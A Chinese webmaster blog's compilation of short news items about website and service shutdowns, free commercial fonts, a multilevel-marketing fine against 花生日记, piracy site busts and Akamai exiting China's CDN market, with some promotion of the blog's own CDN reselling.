一开始中文域名推广的时候,就有很多骗子打着中文域名品牌保护的旗帜欺骗一些不知情的人大量买入中文域名,结果被爆中文域名根本就是毫无价值可言,因此做网站如果不是非必要,千万别选中文域名,如果你在英文COM域名没找到合适的,可以关注一些其它后缀的,比如CC域名,像主机吧新做的云加速(www.yunjiasu.cc)就是用中文域名,两天就被百度收录了,效果非常好。 #### 又一个社区平台停运:腾讯朋友App将于6月30日停止运营 近日,腾讯旗下社区平台朋友App宣布,由于业务发展策略调整,将于2021年6月30日关闭服务器,正式停止运营。腾讯朋友App原名“QQ校友”,2009年1月6日正式发布,2011年7月更名为“朋友网”,是一个实名社交网络,为用户提供行业、公司、学校、班级、熟人等真实的社交场景。 2017年7月14日,“朋友网”发布公告称,将于2017年8月6日正式停止服务和运营。 不过就在2019年11月,腾讯推出了“朋友”APP,这意味着“朋友网”以APP的形式再次回归,用户可通过QQ、微信账号登陆。 #### 又一互联网传销被抓?“花生日记”涉嫌传销被罚千万 “3·15”前夕,一家社交电商平台因涉及违法传销,被监管部门开出巨额罚单。 3月14日,社交电商平台花生日记因涉及传销违法行为,被广州市工商行政管理局责令改正,并处罚150万元,没收违法所得7306.58万元,累计罚没7456.58万元。 这是中国社交电商领域第二宗巨额罚没案例,也是截至目前最大的一例。2017年5月,云集微店涉嫌以“交入会费”、“拉人头”等形式开展传销活动,被杭州滨江区市场监管局罚没958万余元。 据悉,花生日记创办于2017年7月,法定代表人杨仙强,曾获数千万美金融资,但没有披露具体投资机构。 因涉违法传销 被罚没逾7000余万元 行政处罚决定书显示,2017年4月花生日记与淘宝签订协议,获得淘宝(中国)平台应用数据接口(API)权限,成为阿里妈妈推广服务商,并同意采用阿里妈妈的“淘宝联盟”CPS营销方式(即淘宝按商品成交量收取推广服务费),取得从“淘宝联盟”平台采集商品信息至花生日记平台的权限。 2017年7月28日,花生日记APP上线运营,按消费者喜好、推广费用金额大小等设置筛选条件,主动选择推介“淘宝联盟”中相关商家的商品信息。当时平台规定只有注册成为会员,才能登录浏览商品信息,并通过平台链接跳转至天猫或淘宝购买商品。 决定书指出,从2017年7月28日至2018年9月25日立案期间,花生日记以平台运营商可获取其发展的会员所购买商品一定比例的佣金为诱饵,发展了多个粉丝数量多、流量大的流量运营公司作为分公司,再由分公司管理运营商,运营商负责发展会员,按照层级提取酬金。 花生日记设定了“平台(分公司)—运营商—超级会员—超级会员。。。 …超级会员”的层级式管理架构,采取多层级佣金计提制度和会员升级费用等手段,发展会员2100多万人,会员层级最多达51级,遍及全国各省市,收取佣金金额达4.57亿元。 广州工商局认定,花生日记要求会员交纳99元升级费用成为超级会员,进而取得发展他人成为超级会员资格以牟取下线佣金计提的行为,以及以多层级方式发展会员并形成上下线,依据下线会员购物取得的佣金进行多层级计提的行为,均构成传销, 对其作出责令改正、没收违法所得7306.58万元、罚款150万元的处罚。 一年发展2000多万会员 层级最多达51层 来看看花生日记的传销经营模式: 1、发展平台会员,收取“超级会员”费用。 在2017年7月28日至2018年1月15日间,花生日记规定会员只能领取平台优惠券,超级会员和运营商才能获得发展下线并从下线人员消费金额中提取佣金的资格,而会员升级成超级会员需交纳99元费用。 期间花生日记共发展超级会员7247人,收取费用71.75万元。后因有会员投诉,花生日记从2018年1月16日起将会员和超级会员合并,用户一经注册就成为超级会员,不再收取费用。 2、以平台管理运营商,并以运营商为金字塔顶层发展下级超级会员,通过会员消费实现层级计酬。 花生日记通过各种渠道发展粉丝数量多、流量大的流量运营公司作为分公司,分公司负责发展和管理运营商,通过微信、微博、朋友圈、快手、抖音等社交平台及线下宣传等方式推广平台,大量发展下级会员,以获取其消费后的佣金计提。 据披露,花生日记的运营商大部分为自然人,主要来源于两个途径:一是分公司直接将名下有“流量”的成员发展成运营商;二是超级会员成长值达达到5000点、自愿升级做运营商,升级后与原上级运营商脱钩,其之前发展的会员全部转为下级,成为新链条,按运营商规则提取佣金。 而用户要成为花生日记超级会员,需扫描平台配发给运营商的专属邀请码;超级会员注册成功后,又会获得平台提供的专属邀请码,再邀请他人扫码注册成为其下级超级会员。运营商与超级会员、超级会员之间通过专属邀请码建立上下级关系。 截止至2018年9月25日,花生日记平台形成了31530个以运营商为塔尖的金字塔结构,会员总数达2153.46万人。其中,层级结构达到三级及以上的会员共2149.61万人,占全部会员人数的99.82%,层级最多的链条已发展至51层。 在这条“推销商品—引导购物—计算佣金—识别层级—分配佣金”的链条中,其佣金基本分配规则为:超级会员通过平台购买商品产生佣金后,花生日记剔除淘宝扣除的10%至12%佣金服务费后,将剩余佣金视为100%,花生日记计提18%,运营商计提22%,余下部分按50%和10%的比例,分发给购物的超级会员及其上一级会员。 经核算,自2017年7月28日至2018年9月25日,在减除淘宝的推广服务费后,平台共产生佣金4.02亿元,花生日记通过传销方式获取非法所得7234.83万元。 回应监管部门处罚 自称2020年将赴美IPO 今日,花生日记针对处罚发布了一则声明,称“完全尊重并接受监管机构的处罚”,表示“早期发展中确有不合规的做法,2018年初已经花大力气做了整改和规范,目前运营模式已经合法合规”。 并称“社交电商是新生事物,在发展过程中遇到坎坷和挫折是不可避免的,保持积极的心态,与监管部门紧密联系,不断拥抱变化……” 天眼查信息显示,花生日记4位股东均为自然人,创始人杨仙强作为实际控制人持股54.06%。 2018年4月,花生日记曾获得数千万美元A轮融资,但具体金额和投资机构均未披露。据网传的一份花生日记内部文件透露,A轮融资金额3000万美元,且近期其又完成了A+轮6000万美元融资。 在去年2月也就是获得融资前夕,36氪的一篇《小程序“引爆”、拼多多“崛起”、花生日记“上天”,社交电商到底怎么玩?》的报道中提及花生日记。其中如此描述: “一款叫花生日记的导购类APP ,借助淘宝客在微信里的裂变迅速起量。上线三个月用户突破百万,登上AppStore 免费榜前100,GMV数亿元并还在翻倍,借用一位投资人朋友的话,这个量简直要上天。据了解国内几乎所有主流机构都在关注这个项目。” 不久前极光大数据的一份关于优惠比价APP的研究报告,花生日记被纳入研究范围,并上榜优惠比价APP用户偏好TOP10,以70.36的偏好指数位列第二名。 据前述内部文件透露,花生日记计划2020年赴美国纳斯达克上市,为此从2018年1月份开始,其对所有业务进行合规性准备,保证公司所有业务合乎国家法律法规,顺利上市。 该文件还表示,经咨询律师和工商部门意见,花生日记发现在2018年1月前收取会员99元会费,违反了相关法规,因此主动向工商部门提交罚款并达成谅解。自云集(指云集微店)之后,花生日记缴纳了社交电商第二笔史上最贵的学费——7000多万元。 花生日记在文件中称,其已于2018年2月起不收取任何费用,3月中旬接入淘宝联盟渠道ID,按照企业运营规范化发展,保障运营中心和运营商的可持续发展,一起完成IPO共享成果。 文件还披露了花生日记的上市进度:除已提及的两轮融资,近期完成了海外VIE架构搭建,并计划在2019年6月和12月分别完成B轮和C轮融资,最终2020年在美国纳斯达克上市。 随后,一位疑似花生日记员工在微信朋友圈谈及公司被处罚的事实,言语中似乎确认融资款项已到位,还称“公司最难的是去年而不是现在”,否认倒闭传言,并表示“为IPO而努力,一起涨身价”。 花生日记是否传销引发网友讨论 不过关于花生日记到底是不是传销的问题,在网络上引起了网友的激烈争论。 在知乎“如何评价花生日记?”的帖子下,100多个回答分为了两个阵营。知乎用户“压力不大”的一个回答获得了400多赞: 也有为花生日记辩驳的人,大多持以下观点: 此外网友还发出了一系列问题截图: #### 又一企业网站使用百度云加速CDN防御CC攻击成功 说到CC攻击,一直都是各网站建设者头疼的事情,前几天一企业客户找到主机吧,说网站服务器在阿里云,被攻击了,内存和CPU满了,经常网站打不开,重启后才可以。经过他的描述主机吧很快就确定了,这是CC攻击,什么是CC攻击呢?CC攻击是DDOS(分布式拒绝服务)的一种形式,也是近年来一种常见的网站攻击形式,其攻击原理是通过代理服务器或者肉鸡向受害主机不停地发大量数据包,造成对方服务器资源耗尽,直到对方服务器宕机崩溃。不可否认,CC攻击会造成很大的影响,使真正的用户访问不了或者访问很慢,导致大批量用户流失,网站流量骤降,给企业造成巨大的损失。 一开始主机吧介绍这位客户买百度云加速专业版防护,客户觉得贵,在淘宝买了几家一两百块的服务,结果防御不了,人家还不让退钱,重新找到这边的时候已经是一天后了,网站停一天了浪费了大把时间。 后来客户又自己搞了个百度云加速免费版的,结果还是不行,这才找这边开了个专业版的。在主机吧的操作下,给客户更换了服务器IP并等DNS更改生效后再更换新IP上云加速,这样一来源服务器IP就找不到了。一切操作搞定上线后,果然可以访问了. 百度云加速防御效果看得见,立竿见影,非常适合中小站长使用,而且价格便宜,比如专业版,经过代理购买也才600元/年,完全在中小站长购买能力范围。有需要的可以直接到主机吧淘宝店咨询购买。 #### 又一免费博客平台宣布关停:网易博客正式停止运营 早在之前就有预感网易博客将会关停,果然8月21日就收到网易博客停止运营的消息。之前网易博客就很多功能用不了,甚至发的文章也要经过审核。网易其实已经在一年前就处在半死不活的状态了。博客活跃度不高,很多以前热门博客也停更了,停止运营也是意料中的事了。最新消息网易博客将搬迁至网易旗下轻博客LOFTER上,这是一个相对封闭的博客,有点类似于QQ空间和微信朋友圈那种,熟悉社交博客了,以往的开放似博客不存在了,也许这也是博客的一种延续吧。很多人都说博客是不是已经死了?答案是否的。主机吧博客创建半年以来,现在已经日均500IP的访问量的,几乎都是从搜索引擎来的,实事告诉我们,只要肯努力,你的内容还是很多人看的。 #### 又一免费商用字体:麦当劳授权薯条字体开源免费用 11月2日消息,上周,麦当劳授权薯条体在GitHub上开源。 字体带有薯条和番茄酱设计风格,颇为别致。 按照官方说法,字体支持macOS、Windows等操作系统,支持应用到Illustrator、Photoshop、Keynote 、Sketch等软件以及Chrome、Edge、Safari等浏览器。 目前麦当劳薯条体已经免费开放下载,只要标注#麦当劳薯条体字样就能自由使用,包括商业用途。 下载地址:点我 #### 又一免费服务终结:DNS服务商CloudXNS7月16日起将停止免费用户 7月10日 消息:昨日晚间,CloudXNS运营团队发布《关于 CloudXNS 停止免费用户的公告》称,将于2019年7月16日0时起,停止免费使用CloudXNS的服务。 资料显示,CloudXNS是北京快网自主研发全新架构的智能DNS解析系统,提供多元化智能DNS解析服务。CloudXNS是在传统DNS系统上加入策略解析后的高级智能DNS系统,可以判断用户来源,就近访问调度。 以下为CloudXNS公告全文: 为贯彻国家网络安全政策法规,加强监管力度,更好的服务于 VIP 客户,我司将于2019年7月16日0时起,停止免费使用我司 CloudXNS 客户的服务,有意向使用 VIP 服务的用户,请尽快与我司联系! #### 又一商城关闭,日本乐天在美关闭线上商城Buy.com 日本乐天集团向外媒TechCrunch证实,该公司已关闭其美国在线零售商城Buy.com并将在未来两个月内逐步关闭其业务。据知情人士透露,关闭意味着美国总部也将裁员,这意味着 87 人将失去工作。 “我们已经决定淘汰美国乐天市场,”该公司一名代表在给TechCrunch的电子邮件中表示。 不过,他们澄清称,该公司在Rakuten.com运营的“现金返还”推荐业务绝对不会关闭,而且比以往任何时候都更加强大。 乐天美国门店的客户将在未来两个月内仍可以下单,之后该网站将完全关闭。奖励和佣金业务的用户不会看到任何重大变化,其他业务如Kobo电子阅读部门也不会受到影响。 虽然这次关闭对乐天来说是一个打击,但几乎并不让人感到意外。该公司已经实现了多元化并在全球范围内投资了大量业务和垂直领域--甚至还推出了一种加密货币,因此,这样一个市场的失败虽然令人遗憾但不会在这一点上对他们的底线造成太大影响。 #### 又一大型网站关闭,易趣网宣布关闭,已运营 23 年! 又一大型网站关闭,易趣网宣布关闭,已运营 23 年! 7 月 23 日消息,7 月 12 日,电商网站易趣网络平台(www.eachnet.com)发布了关闭公告,公告称,由于公司调整运营策略,决定停止易趣网络平台(www.eachnet.com)运营,关闭易趣网站。在 2022 年 8 月 12 日 24:00,易趣网将关闭网站所有商品、商铺的交易功能,关闭易趣网用户注册、登录、充值功能,关闭网站服务器。 下面是公告内容: 尊敬的易趣网用户:由于我公司调整运营策略,决定停止易趣网络平台(www.eachnet.com)运营,关闭易趣网站,并发布以下公告:本次公告发布期为 30 日,自公告发布之日起第 31 日(即 2022 年 8 月 12 日 24:00),易趣网将关闭网站所有商品、商铺的交易功能,关闭易趣网用户注册、登录、充值功能,关闭网站服务器。为保证您的钱款安全,请您尽快登录易趣网,查看您的账户及以过往交易记录;在 2022 年 8 月 12 日 24:00 前,我们还为您保留网上余额退回功能,请您及时操作,保障您的合法利益。本次公告发布期内,请您拒绝点击易趣网上或以网上商铺名义给您发送的一切商品或支付链接,避免产生不必要的财产损失和纠纷。本次公告发布期内,我们也为您开通客服邮箱 cs@eachnet.com,专项解答账户余额退回问题。敬请各位用户留意以上公告内容。最后,衷心感谢各位用户给予易趣网的支持与陪伴!祝各位万事顺意!特此公告!上海盈实信息技术有限公司2022 年 7 月 12 日 据百科知识,1999 年 8 月,易趣在上海创立,主营电子商务,由邵亦波及谭海音所创立,两人同为上海人,毕业于美国哈佛商学院。2002 年,易趣与 eBay 结盟,更名为 eBay 易趣,并迅速发展成国内最大的在线交易社区。2006 年 12 月,eBay 与 TOM 在线合作。2007 年,两家公司推出为中国市场定制的在线交易平台。2010 年 2 月,易趣推出海外代购业务。2012 年 4 月,易趣不再是 eBay 在中国的相关网站,易趣为 Tom 集团全资子公司。易趣所有业务由 eBay 剥离,独立运营。 目前网站运营环境不大乐观,由于抖音视频的流量不断扩大,新老网民流量已经不再喜欢浏览网页了,这对于网站来说是非常不友好的。 #### 又一家中小型IDC倒了 不知道有没有站长记得杭州中电云集这家虚拟主机服务商。 主机吧当年是中电云集的的代理商,在中电云集消费过几万块钱,中电云集可以说是站长时代非常有名的虚拟主机服务商,原因是其控制面板非常的新颖,跟传统的虚拟主机控制面板不一样。 其虚拟主机也非常好用,当时提供的阿里云机房的BGP虚拟主机挺受欢迎的,价格还便宜,不过随着云服务器的崛起,虚拟主机也没落了,业务就变少了。 中电云集的不仅提供虚拟主机还提供控制面板系统,可以安装在VPS、云服务器上,有点类似于现在的宝塔,不过可惜后面不知道为什么没怎么开发了。 这样的一个企业,主机吧今天发现官网居然无法打开了。 可能已经关很久了,主机吧在企查查看了下,所属的公司还在开业,但看情况已经没有经营了哈。 #### 又一家云服务商停止运营了 这两年国内云服务市场内卷相当严重,很多云服务商因为竞争力等原因停止运营了,这不近日,前海云发布《停止提供服务的通知》,该平台于2020年5月正式上线运营,主要为前海片区内科创企业提供云服务。2021年6月,该单位对项目进行了重新评估,决定2021年8月31日0:00前正式关停该项服务和支持,同时收回所使用资源。深圳市前海服务集团有限公司是深圳市前海管理局全资直属公司,以“深港科创合作的践行者,全球科技服务的引领者”为发展愿景,通过聚焦科创空间运营、高端科技服务、产业投资和前海智慧城市建设运营等核心业务,打造前海科创产业投资运营服务平台,助力前海科创企业成长,推动科创产业集聚发展。 #### 又一家海外CDN服务商终止在华业务,Akamai 终止在中国 CDN 业务! 根据最新消息:Akamai 计划停止在中国的 CDN 业务,业务将由腾讯和网宿接手。 Akamai 在致客户的一封信中表示,在华业务将于 2026 年 6 月 30 日起停止。 在此之后,任何剩余的内容请求都将自动从中国邻国提供。 针对那些希望将数据保留在中国境内的客户,Akamai 表示可以转向其两个合作伙伴:腾讯云、网宿。 腾讯的迁移服务和支持目前可供使用,而网宿迁移服务“很快推出”。 Akamai 在致客户的信中表示:“我们理解这种变化可能具有挑战性,但我们致力于使这一过程尽可能顺利。”长期以来,这家公司一直在寻求从 CDN 传统业务转向回报更高、更稳定的业务。Akamai 联合创始人兼首席执行官 Tom Leighton 博士在 2024 年第二季度财报电话会议上表示:“Akamai 最初因发明 CDN 而闻名,如今我们仍然是这个市场的全球领导者。” “正如我们在之前的电话会议中所说,我们的分发业务在最近几个季度受到了宏观经济和地缘政治不利因素的挑战。” 他补充道:“我们将继续采取措施以保持我们的市场领导地位,同时将我们从分发产品系列所得的大部分现金流再投资到快速增长的业务领域。第二季度,分发业务占公司收入的三分之一,达到 3.29 亿美元。这与五年前相比发生了很大的变化,当时分发业务占 Akamai 收入的三分之二。” Leighton 在第三季度财报电话会议上表示:“Akamai 正在经历一场根本性的转型,从内容分发先驱转变为网络安全和云计算公司,在网上为公司企业提供支持和保护。”“我们很高兴看到我们的安全业务年营收超过 20 亿美元,我们对云计算未来的增长大有潜力感到非常兴奋。” Akamai Technologies是一家全球领先的内容分发网络(CDN)和云服务提供商,总部位于美国马萨诸塞州剑桥市。公司由麻省理工学院的科学家们创立,他们开发了一种突破性的运算法则,用于在网络服务器所组成的大型网络中智能安排路由和复制内容,这一技术最终发展成为Akamai的CDN服务,Akamai 是最早做CDN服务厂商。 Akamai的CDN服务是全球最大的分布式计算平台之一,为全球互联网流量的15%到30%提供支持。通过在全球部署服务器,Akamai能够确保用户无论身在何处都能快速、安全地访问网站和应用程序。Akamai的服务不仅限于加速内容交付,还提供网络安全解决方案,帮助企业抵御DDoS攻击等网络威胁。 此外,Akamai还提供了一系列安全服务,如Guardicore服务,以及专业培训解决方案,如Akamai Training,以支持客户的数字化业务需求。公司通过其全球分布的服务器网络,为像Audi、NBC、Fujitsu和纳斯达克这样的公司和机构处理数以亿万的网络请求,成为互联网经济的新模范。 Akamai在推动中国企业全球化创新方面也发挥着重要作用,通过其云服务,为中国企业提供从云分发(CDN)、安全及计算的一站式服务,帮助他们在全球市场上取得成功。 #### 又一家电影网站出事 因侵权播放动漫作品200余部 ) 7月16日 消息:昨日,闵行检察公众号发文称,2015- 2019 年,犯罪嫌疑人温某某购入www.dilidili.com(简称D站),免费为网站用户提供最新日本动漫作品。 期间,温某某成立了相关的科技有限公司,并雇佣犯罪嫌疑人郑某某、林某和黄某从事免费动漫视频播放和广告招商。 在未经权利人许可的情况下,郑某某、林某从其他动漫网站拷贝动漫资源至D站进行免费播放并提供下载。同时,黄某通过在D站上广告招商牟取不法利益。 截止案发,D站播放侵权动漫作品 200 余部( 3000 余集),其中包含《黑社会的超能力女儿》《龙王的工作!》《混沌之子》等热门日本动漫作品。 上海市闵行区人民检察院以涉嫌侵犯著作权罪对犯罪嫌疑人温某某、郑某某、林某、黄某批准逮捕。 #### 又一家网盘倒:下沃云盘业务将于2月28日下线 昨日,据IT之家消息称,用户收到发布通知:因为业务调整,沃云盘业务将于2018年2月28日下线。‘ 搜索得知,所谓的沃云盘即沃家云盘,基于云计算技术的个人/家庭云数据中心,是一个提供文件同步、备份及分享等服务的网络云存储平台。但与其它网盘相比,沃云盘没有会员制,不收取月费、年费;联通4G用户还能每月领专属流量500M,白金会员还享有2TB超大云空间。 本以为联通是电信运营大户,搞云盘应该不差钱,结果还是倒下了。 沃云盘却成为了继360、金山快盘、新浪微盘等网盘后又一宣布关闭的网盘。可惜了,免费的时代也结束了! 其实说到底还不是不赚钱罢了!可悲的是很多用户认为免费都理所当然了。 从360云盘下线以来,可以看出免费网盘最终恐怕都会陆续下线,Google那个才16G而且和邮箱公用,收费是1T每年99.99美元。云盘很烧钱,如果一直无法盈利再加上运营费用的迟早要关的!目前国内大型免费网盘也只有百度云盘了,希望一直坚持下去吧。   延续:沃云盘官方已声明从未发布过关停公告 #### 又一家网络安全公司经营困难,北京灰帽科技有限公司CEO变卖家产发放费用 近几年,国内网络安全行业的公司生存状态一直都不大好,比如360去年就亏损十多个亿,而今天的主角北京灰帽科技有限公司也是一家网络安全公司,主要为党政机关、能源、金融、运营商、国央企等组织机构提供多种网络安全服务。 最近,也遇到了经营困难的情况,CEO发《道歉信》称变卖家产发放费用,以下是全文: 首先感谢从 2019 年创业至今兄弟们的信任,让北京灰帽科技有限公司不断的进步,在网络安全这个行业有了自己的一席之地。截止到 2025 年 1 月,公司依旧是在良性的发展,尽管 2024 年整体的网络安全环境不太好,灰帽科技接手的项目依旧是在持续增长,得到了更多客户的信任。唯一难点就是遇到了回款比较难,2022 年的项目至今也有未回款,2023 年的项目签订了合同在等回款,2024 年的项目做完了大部分都没有回款,可能要面临的是 2025 年底才可以收到 2024 年的部分回款。前期我也是考虑兄弟们跟着我不容易,基本都是在个人垫资,尽可能让大家拿到该有的费用!但还是在 2024 年大环境不太理想的情况下,还是出现了资金的短缺,周转困难的情况发生。我也深刻的认识自己不是一个优秀管理者,在管理中总是意气用事。目前为止有部分人员收到了 2024 年国家网络安全保障的费用,还有部分人员没有收到 2024 年国家网络安全保障的费用,兄弟们不用担心,欠了大家每个人的费用我都会承认,现在也都跟大家核对清楚了最终的费用,大家也有跟我签订的 2024 年网络安全保障行动的协议。针对 2025 年的规划,我做出以下调整和承诺:1、首先公司账面上我会留出来足够的费用保证员工的社保,公积金正常扣除,以及部分员工的每个月的基本生活费,每个员工我也不会降薪。(特殊情况的员工,每个月也会按时发放 30000 /月的薪资)其他人员最晚 2025 年 5 月 31 日补全之前的所有薪资费用。2、没有发放 2024 年网络安全保障行动费用的兄弟们,辛苦您给我 3 个月的时间。我不会跑路,我会勇敢的去面对当下的局势,在节后变卖个人资产,来给大家发放全部费用,如果有兄弟真的等不了的,可以向法院对我进行起诉。(最晚 2025 年 4 月30日前所有的兄弟们费用都会全额发放,结算清楚)3、昨晚也跟我爱人交流了一晚上,我的爱人对我创业也给予了最大的支持,哪怕现在我们名下的所有资产变卖,也不会拖欠兄弟们的每一分血汗钱。公司战略,规划,运营也会有重大的调整。此致 敬礼!北京灰帽科技有限公司 李聪 2025 年 01 月 21 日 做网络安全行业的,基本都是政企用户是大客户,所以回款非常慢,如果行业景气的情况下,接到企业订单就会有钱,但如果都是政府客户的话,那就需要垫钱先弄了,所以很多时候是周转苦难的,由此可见目前网络安全行业景气度并不高,有实力的企业都接不到客户了。 #### 又一家老牌盗版影视站“圣城家园”被端 2月17日 消息:近年来,全国各地均查处了不少盗版影视网站。用“野火烧不尽”来形容盗版影视网站一点儿也不为过。 据山西晚报报道,今年 2 月 11 日,国家版权局向山西警方转来一条案件线索,“圣城家园”网站涉嫌网上侵权盗版。 经过立案调查发现,“圣城家园”网站在未经备案的情况下,大量提供未经授权的电影、唱片、游戏、软件等资源链接,供会员公开下载,并通过会员收费与推广广告的形式牟利,网站注册会员达 200 万人次,点击量达 13 亿次。 为了彻底摧毁这个特大网站侵权盗版团伙,山西警方此后对河南景安国际有限公司租赁香港的 4 台服务器进行数据查封,并从服务器查获未经授权视频资源 12700 余个,唱片资源 16300 余个,游戏资源 4700 余个,高清MV资源 4000 余个,软件资源 9900 余个。 目前该案件已经抓或嫌疑人朱某、孙某、李某某等三人,已移送检察机关进行起诉。 #### 又一家论坛宣布关闭:太平洋电脑网论坛宣布关闭 太平洋电脑网(PConline)宣布将于2023年5月20日关闭太平洋电脑网论坛入口。太平洋知科技APP正常运营,不受影响。 具体下线时间安排如下: 1、2023年5月20日,关闭入口。 2、2023年8月31日,停止运营。 届时太平洋电脑网论坛将无法访问、登录、发布内容、查看已发布的内容。 太平洋电脑网于1999年正式推出,是国内首家以专业电脑市场联盟为基础的大型IT资讯网站,自创建以来一直致力于为国内IT企业与终端用户提供全面、权威、专业的IT资讯服务。 #### 又一小说网站关闭,宝书网宣布关闭 6月30日 消息:今日早间,#宝书网#登上热搜。据悉,宝书网发布公告称,为响应国家号召,本站永久关闭。 目前,宝书网(baoshuu.com)官网已无法打开。 同时,宝书网还表示,本站别无分站,其它同名网站均与本站无关。 资料显示,宝书网是一家电子书下载网站,小说种类包括玄幻、武侠、穿越、言情、都市等。 以下为宝书网公告全文: 响应国家号召,本站永久关闭。本站别无分站,其它同名网站均与本站无关。 感恩青葱岁月相知相伴,有一种离别叫不说再见!愿以梦为马,不负韶华! 宝书网关闭意味着国内盗版小说站已经到了尽头了,目前做小说站是非常危险的,站长们千万别碰哈。 #### 又一新的免费商用字体:“快看世界体”字体 3月2日 消息:今日,国漫IP平台和分享社区快看APP宣布,推出”快看世界体“官方字体,目前免费开放给所有创作者使用,可登录快看官网下载。 快看世界体是快看第一款自主创作的字体,从概念到录入完成,耗时1年,其字形均衡考究,适用于正文和标题,无论是对话文字或是短视频封面均适用。 快看世界体由快看KKDC出品,字体设计以漫画中的对话框元素为起点, 融入快看ACGN文化,年轻潮流,大胆有态度。 字体特点末端尖角,中宫外扩、字面瘦长、倾斜8度;包含3501个字。 现应用于快看品牌营销、漫展、内部企业文化宣传、客户端等场景。免费授权全社会使用(包括商用) 快看世界体横划末端的尖角,灵感来源于漫画中对话框的形状。漫画的对话框通常是由线条画成的椭圆形或矩形,带有一个突起的尖角。通过提取对话框尖角特点,结合在笔划末端,形成快看世界体的典型特征,同时也体现了快看的起点。 #### 又一款免费商用字体:荣耀字体 HONOR Sans 12月5日消息:在日前的荣耀 MagicOS 7.0 发布会上,荣耀官方还同时发布了了全新的 HONOR Sans 字体,号称是业界首款支持字重和中宫双重无极可变的字体,将荣耀字体与 UI 融合,通过间距优化,让排版更整齐,层次更清晰。 图片来自HONOR 据介绍,HONOR Sans以黑体为基础,能够根据用户需求对字重和中宫进行调节,从而在不同环境下均能确保字体的匀称美观。在设计上,HONOR Sans相比标准的黑体则在笔画曲率、结构布局上进行了优化,在不影响字体可读性的前提下,有效提升了字体的舒适性,降低了长时间阅读时对视觉造成的疲劳。 荣耀将其称为「会呼吸的字体」,官方表示 HONOR Sans 将面向全社会免费授权开放,覆盖全场景全人群使用,而且未来也将推送到荣耀全场景设备上。 目前这款与方正字库合作打造的字体已经上线开发者网站,免费下载,并允许进行商业使用。 HONOR Sans 字体官网下载地址: https://contentplatform-drcn.hihonorcdn.com/developerPlatform/HONOR_Sans_1.0/HONOR_Sans_1.0.zip #### 又一款免费商用字体:钉钉“进步体” 12月29日 消息:就在刚刚,钉钉官方宣布,联合汉仪字库共同打造了一款永久免费商用品牌字体——进步体。 据介绍,钉钉进步体涵盖了中、英文7526个字符。钉钉进步体字体以7°做倾斜,弯钩笔画的弧度向上,让整款字体年轻富有活力,使其在标题场景应用时,更具特点和美感。 钉钉进步体还采用外圆内方的圆角处理方式,并对不同笔划的字体进行了简洁处理,既保正了笔划多的字能简洁不拥挤,又维持了笔划少的字体完整性,在既要优美感又要阅读感的情况下,做到了平衡。 据悉,进步体在钉钉官方、钉钉开放平台、iconfont、字由APP均可获取使用。 官方称,“钉钉进步体”以全新的视觉设计吸引用户注意力,令人耳目一新。同时,更具舒适感的字形笔画更好地展示了钉钉的数字科技感,传递出“让进步发生”的品牌新主张。 钉钉进步体涵盖了中、英文 7526 个字符,字体专为标题、美术字等场景而生,科技活力的同时兼具自然书写美感。钉钉进步体字体以 7° 做倾斜,弯钩笔画的弧度向上,让整款字体年轻富有活力,使其在标题场景应用时,更具特点和美感。钉钉称,希望字体可以更具人文温度,保持亲和不锐利,所以采用外圆内方的圆角处理方式,并对不同笔划的字体进行了简洁处理,既保正了笔划多的字能简洁不拥挤,又维持了笔划少的字体完整性,在既要优美感又要阅读感的情况下,做到了平衡。 官网下载地址:点此直达 #### 又一款免费开源商用字体:得意黑字体 11月16日 消息:昨日,B站UP主 oooooohmygosh宣布,耗时400多天,其与锚坞共同设计开发的免费开源字体 「得意黑」正式发布。 据介绍, 这是一款在人文观感和几何特征中寻找平衡的窄斜体,遵守 SIL Open Font License1.1开源协议。 oooooohmygosh称,会长期更新维护这款字体,也有增加正体、粗体等的计划。 oooooohmygosh表示,希望一年多付出努力的成果能为字体社区带来一些新的源自本土的活力。得意黑这种风格的开源字体以前也没有过,几乎一定会获得非常广泛的使用。但它只应该是一个起点,更希望看到一些真正优质的fork版本出现。 据悉,oooooohmygosh,生活类自媒体,2022年1月,获得哔哩哔哩“2021年度百大UP主”称号,目前B站粉丝达150万。 官方介绍视频: 官网:https://atelier-anchor.com/ typefaces / smiley-sans/ GitHub 链接:https://github.com/ atelier-anchor / smiley-sans #### 又一电商倒下乐蜂网宣布将于9月18日停止运营 8月28日 消息:今日,女性时尚购物平台乐蜂网发布通知称,由于公司业务调整,乐蜂网(包括PC端及APP端)均将在 2019 年 9 月 18 日停止运营。 资料显示,乐蜂成立于2008年8月,由知名电视人李静创办。2014年2月唯品会战略入股乐蜂网75%股份,共同打造顶尖女性时尚购物平台。 以下为乐蜂网通知全文: 亲爱的乐蜂网用户: 感谢您与乐蜂网一路相伴,然而聚散终有时。我们在此非常遗憾的通知您:由于公司业务调整,乐蜂网(包括PC端及APP端)均将在 2019 年 9 月 18 日停止运营,届时您将不能登录乐蜂网。乐蜂网官方公众号也从即日起停止发布更新信息,并申请后台注销账号,给您带来的不便敬请见谅。 乐蜂网停止运营后,我们将一如既往关注您的权益,您仍然可以通过电话联系办理包括客户咨询、退货退款等事宜。获得客服服务的途径为:在 2019 年 8 月 28 日— 2019 年 10 月 17 日期间,您可以拨打乐蜂网客服电话4000001818;自 2019 年 10 月 18 日起,你可以通过拨打唯品会客服电话4006789888。 再次感谢您的陪伴。同时,您可微信搜索“唯品会美妆”公众号,继续为您推荐全球精选的品牌好货,下半场唯品会愿与您一路同行,我们不散。 乐蜂网 2019 年 8 月 28 日   #### 又一直播APP倒下 狗仔直播发布APP关停 3月29日 消息:今日,狗仔直播发布公告称,由于产品优化和升级,APP的各服务和接口将于2019年4月29日全面关停,停止更新和维护。其APP将于2019年3月28日下线各大应用市场下载入口。在狗仔直播内玩游戏的用户可以下载狗仔游戏App均能继续登录该游戏。 资料显示,狗仔直播是一款能观看全中国所有直播的工具,收纳了斗鱼,熊猫,战旗,虎牙,龙珠等几十家直播平台的直播资源,涵盖热门游戏,美女秀场,影视专区,户外,体育等数百个栏目。该直播开发者为北京搜狗科技发展有限公司。 以下为狗仔直播公告全文: 因产品优化和升级,狗仔直播APP的各服务和接口将于2019年4月29日全面关停,停止更新和维护。 其中狗仔直播App将于2019年3月28日下线各大应用市场下载入口,正在狗仔直播内玩游戏的用户可以下载狗仔游戏App (可在以下应用市场下载到狗仔游戏app:应用宝,小米商城,豌豆荚,搜狗手机助手), 在狗仔游戏APP中使用原狗仔直播注册的账号继续登录该游戏(qq、 微信、微博、手机号登陆),会继承您之 前的游戏存档,如果您发现存档没有被继承,请联系狗仔游戏客服qq: 3048161542。 